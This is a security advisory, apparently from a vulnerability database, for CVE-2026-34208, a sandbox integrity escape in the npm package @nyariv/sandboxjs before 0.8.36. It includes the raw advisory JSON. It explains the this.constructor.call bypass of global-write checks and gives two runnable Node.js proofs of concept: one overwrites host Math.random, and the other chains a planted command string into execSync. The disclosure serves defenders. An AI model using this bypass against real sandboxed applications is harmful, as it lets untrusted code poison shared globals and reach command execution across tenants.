GHSA-2GG9-6P7W-6CPJ

Vulnerability from github – Published: 2026-04-03 21:44 – Updated: 2026-04-06 23:18
VLAI?
Summary
SandboxJS: Sandbox integrity escape
Details

Summary

SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process.

Details

The intended safety model relies on write-time checks in assignment operations. In assignCheck, writes are denied when the destination is marked global (obj.isGlobal), which correctly blocks straightforward payloads like Math.random = () => 1.

Reference: src/executor.ts#L215-L218

if (obj.isGlobal) {
  throw new SandboxAccessError(
    `Cannot ${op} property '${obj.prop.toString()}' of a global object`,
  );
}

The bypass works because the dangerous write is not performed by an assignment opcode. Instead, attacker code reaches a host callable that performs writes internally. The constructor used for sandbox global objects is SandboxGlobal, implemented as a function that copies all keys from a provided object into this.

Reference: src/utils.ts#L84-L88

export const SandboxGlobal = function SandboxGlobal(this: ISandboxGlobal, globals: IGlobals) {
  for (const i in globals) {
    this[i] = globals[i];
  }
} as any as SandboxGlobalConstructor;

At runtime, global scope this is a SandboxGlobal instance (functionThis), so this.constructor resolves to SandboxGlobal. That constructor is reachable from sandbox code, and calls through Function.prototype.call are allowed by the generic call opcode path.

References: - src/utils.ts#L118-L126 - src/executor.ts#L493-L518

const sandboxGlobal = new SandboxGlobal(options.globals);
...
globalScope: new Scope(null, options.globals, sandboxGlobal),

const evl = context.evals.get(obj.context[obj.prop] as any);
let ret = evl ? evl(obj.context[obj.prop], ...vals) : (obj.context[obj.prop](...vals) as unknown);

This creates a privilege gap: 1. Direct global mutation is blocked in assignment logic. 2. A callable host function that performs arbitrary property writes is still reachable. 3. The call path does not enforce equivalent global-mutation restrictions. 4. Attacker-controlled code can choose the write target (Math, JSON, etc.) via .call(target, payloadObject).

In practice, the payload:

const SG = this.constructor;
SG.call(Math, { random: () => 'pwned' });

overwrites host Math.random successfully. The mutation is visible immediately in host runtime and in fresh sandbox instances, proving cross-context persistence and sandbox boundary break.

PoC

Install dependency:

npm i @nyariv/sandboxjs@0.8.35

Global write bypass with pwned marker

#!/usr/bin/env node
'use strict';

const Sandbox = require('@nyariv/sandboxjs').default;
const run = (code) => new Sandbox().compile(code)().run();
const original = Math.random;

try {
  try {
    run('Math.random = () => 1');
    console.log('Without bypass (direct assignment): unexpectedly succeeded');
  } catch (err) {
    console.log('Without bypass (direct assignment): blocked ->', err.message);
  }
  run(`this.constructor.call(Math, { random: () => 'pwned' })`);
  console.log('With bypass (host Math.random()):', Math.random());
  console.log('With bypass (fresh sandbox Math.random()):', run('return Math.random()'));
} finally {
  Math.random = original;
}

Expected output:

Without bypass (direct assignment): blocked -> Cannot assign property 'random' of a global object
With bypass (host Math.random()): pwned
With bypass (fresh sandbox Math.random()): pwned

With bypass (host Math.random()) proves the sandbox changed host runtime state immediately.
With bypass (fresh sandbox Math.random()) proves the mutation persists across new sandbox instances, which shows cross-execution contamination.

Command id execution via host gadget

This second PoC demonstrates exploitability when host code later uses a mutated global property in a sensitive sink. It uses the POSIX id command as a harmless execution marker.

#!/usr/bin/env node
'use strict';

const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');

const run = (code) => new Sandbox().compile(code)().run();
const hadCmd = Object.prototype.hasOwnProperty.call(Math, 'cmd');
const originalCmd = Math.cmd;

try {
  try {
    run(`Math.cmd = 'id'`);
    console.log('Without bypass (direct assignment): unexpectedly succeeded');
  } catch (err) {
    console.log('Without bypass (direct assignment): blocked ->', err.message);
  }
  run(`this.constructor.call(Math, { cmd: 'id' })`);
  console.log('With bypass (host command source Math.cmd):', Math.cmd);
  console.log(
    'With bypass + host gadget execSync(Math.cmd):',
    execSync(Math.cmd, { encoding: 'utf8' }).trim(),
  );
} finally {
  if (hadCmd) {
    Math.cmd = originalCmd;
  } else {
    delete Math.cmd;
  }
}

Expected output:

Without bypass (direct assignment): blocked -> Cannot assign property 'cmd' of a global object
With bypass (host command source Math.cmd): id
With bypass + host gadget execSync(Math.cmd): uid=1000(mk0) gid=1000(mk0) groups=1000(mk0),...

Impact

This is a sandbox integrity escape. Untrusted code can mutate host shared global objects despite explicit global-write protections. Because these mutations persist process-wide, exploitation can poison behavior for other requests, tenants, or subsequent sandbox runs. Depending on host application usage of mutated built-ins, this can be chained into broader compromise, including control-flow hijack in application logic that assumes trusted built-in behavior.

Severity ?
10.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.36"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34208"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-693",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T21:44:39Z",
    "nvd_published_at": "2026-04-06T16:16:34Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nSandboxJS blocks direct assignment to global objects (for example `Math.random = ...`), but this protection can be bypassed through an exposed callable constructor path: `this.constructor.call(target, attackerObject)`. Because `this.constructor` resolves to the internal `SandboxGlobal` function and `Function.prototype.call` is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process.\n\n### Details\nThe intended safety model relies on write-time checks in assignment operations. In `assignCheck`, writes are denied when the destination is marked global (`obj.isGlobal`), which correctly blocks straightforward payloads like `Math.random = () =\u003e 1`.\n\nReference: [`src/executor.ts#L215-L218`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/executor.ts#L215-L218)\n\n```ts\nif (obj.isGlobal) {\n  throw new SandboxAccessError(\n    `Cannot ${op} property \u0027${obj.prop.toString()}\u0027 of a global object`,\n  );\n}\n```\n\nThe bypass works because the dangerous write is not performed by an assignment opcode. Instead, attacker code reaches a host callable that performs writes internally. The constructor used for sandbox global objects is `SandboxGlobal`, implemented as a function that copies all keys from a provided object into `this`.\n\nReference: [`src/utils.ts#L84-L88`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/utils.ts#L84-L88)\n\n```ts\nexport const SandboxGlobal = function SandboxGlobal(this: ISandboxGlobal, globals: IGlobals) {\n  for (const i in globals) {\n    this[i] = globals[i];\n  }\n} as any as SandboxGlobalConstructor;\n```\n\nAt runtime, global scope `this` is a `SandboxGlobal` instance (`functionThis`), so `this.constructor` resolves to `SandboxGlobal`. That constructor is reachable from sandbox code, and calls through `Function.prototype.call` are allowed by the generic call opcode path.\n\nReferences:\n- [`src/utils.ts#L118-L126`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/utils.ts#L118-L126)\n- [`src/executor.ts#L493-L518`](https://github.com/nyariv/SandboxJS/blob/cc8f20b4928afed5478d5ad3d1737ef2dcfaac29/src/executor.ts#L493-L518)\n\n```ts\nconst sandboxGlobal = new SandboxGlobal(options.globals);\n...\nglobalScope: new Scope(null, options.globals, sandboxGlobal),\n```\n\n```ts\nconst evl = context.evals.get(obj.context[obj.prop] as any);\nlet ret = evl ? evl(obj.context[obj.prop], ...vals) : (obj.context[obj.prop](...vals) as unknown);\n```\n\nThis creates a privilege gap:\n1. Direct global mutation is blocked in assignment logic.\n2. A callable host function that performs arbitrary property writes is still reachable.\n3. The call path does not enforce equivalent global-mutation restrictions.\n4. Attacker-controlled code can choose the write target (`Math`, `JSON`, etc.) via `.call(target, payloadObject)`.\n\nIn practice, the payload:\n```js\nconst SG = this.constructor;\nSG.call(Math, { random: () =\u003e \u0027pwned\u0027 });\n```\noverwrites host `Math.random` successfully. The mutation is visible immediately in host runtime and in fresh sandbox instances, proving cross-context persistence and sandbox boundary break.\n\n### PoC\nInstall dependency:\n\n```bash\nnpm i @nyariv/sandboxjs@0.8.35\n```\n\n#### Global write bypass with `pwned` marker\n\n```js\n#!/usr/bin/env node\n\u0027use strict\u0027;\n\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst run = (code) =\u003e new Sandbox().compile(code)().run();\nconst original = Math.random;\n\ntry {\n  try {\n    run(\u0027Math.random = () =\u003e 1\u0027);\n    console.log(\u0027Without bypass (direct assignment): unexpectedly succeeded\u0027);\n  } catch (err) {\n    console.log(\u0027Without bypass (direct assignment): blocked -\u003e\u0027, err.message);\n  }\n  run(`this.constructor.call(Math, { random: () =\u003e \u0027pwned\u0027 })`);\n  console.log(\u0027With bypass (host Math.random()):\u0027, Math.random());\n  console.log(\u0027With bypass (fresh sandbox Math.random()):\u0027, run(\u0027return Math.random()\u0027));\n} finally {\n  Math.random = original;\n}\n```\n\nExpected output:\n\n```\nWithout bypass (direct assignment): blocked -\u003e Cannot assign property \u0027random\u0027 of a global object\nWith bypass (host Math.random()): pwned\nWith bypass (fresh sandbox Math.random()): pwned\n```\n\n`With bypass (host Math.random())` proves the sandbox changed host runtime state immediately.  \n`With bypass (fresh sandbox Math.random())` proves the mutation persists across new sandbox instances, which shows cross-execution contamination.\n\n#### Command `id` execution via host gadget\n\nThis second PoC demonstrates exploitability when host code later uses a mutated global property in a sensitive sink. It uses the POSIX `id` command as a harmless execution marker.\n\n```js\n#!/usr/bin/env node\n\u0027use strict\u0027;\n\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst { execSync } = require(\u0027child_process\u0027);\n\nconst run = (code) =\u003e new Sandbox().compile(code)().run();\nconst hadCmd = Object.prototype.hasOwnProperty.call(Math, \u0027cmd\u0027);\nconst originalCmd = Math.cmd;\n\ntry {\n  try {\n    run(`Math.cmd = \u0027id\u0027`);\n    console.log(\u0027Without bypass (direct assignment): unexpectedly succeeded\u0027);\n  } catch (err) {\n    console.log(\u0027Without bypass (direct assignment): blocked -\u003e\u0027, err.message);\n  }\n  run(`this.constructor.call(Math, { cmd: \u0027id\u0027 })`);\n  console.log(\u0027With bypass (host command source Math.cmd):\u0027, Math.cmd);\n  console.log(\n    \u0027With bypass + host gadget execSync(Math.cmd):\u0027,\n    execSync(Math.cmd, { encoding: \u0027utf8\u0027 }).trim(),\n  );\n} finally {\n  if (hadCmd) {\n    Math.cmd = originalCmd;\n  } else {\n    delete Math.cmd;\n  }\n}\n```\n\nExpected output:\n\n```\nWithout bypass (direct assignment): blocked -\u003e Cannot assign property \u0027cmd\u0027 of a global object\nWith bypass (host command source Math.cmd): id\nWith bypass + host gadget execSync(Math.cmd): uid=1000(mk0) gid=1000(mk0) groups=1000(mk0),...\n```\n\n### Impact\nThis is a sandbox integrity escape. Untrusted code can mutate host shared global objects despite explicit global-write protections. Because these mutations persist process-wide, exploitation can poison behavior for other requests, tenants, or subsequent sandbox runs. Depending on host application usage of mutated built-ins, this can be chained into broader compromise, including control-flow hijack in application logic that assumes trusted built-in behavior.",
  "id": "GHSA-2gg9-6p7w-6cpj",
  "modified": "2026-04-06T23:18:19Z",
  "published": "2026-04-03T21:44:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34208"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SandboxJS: Sandbox integrity escape "
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.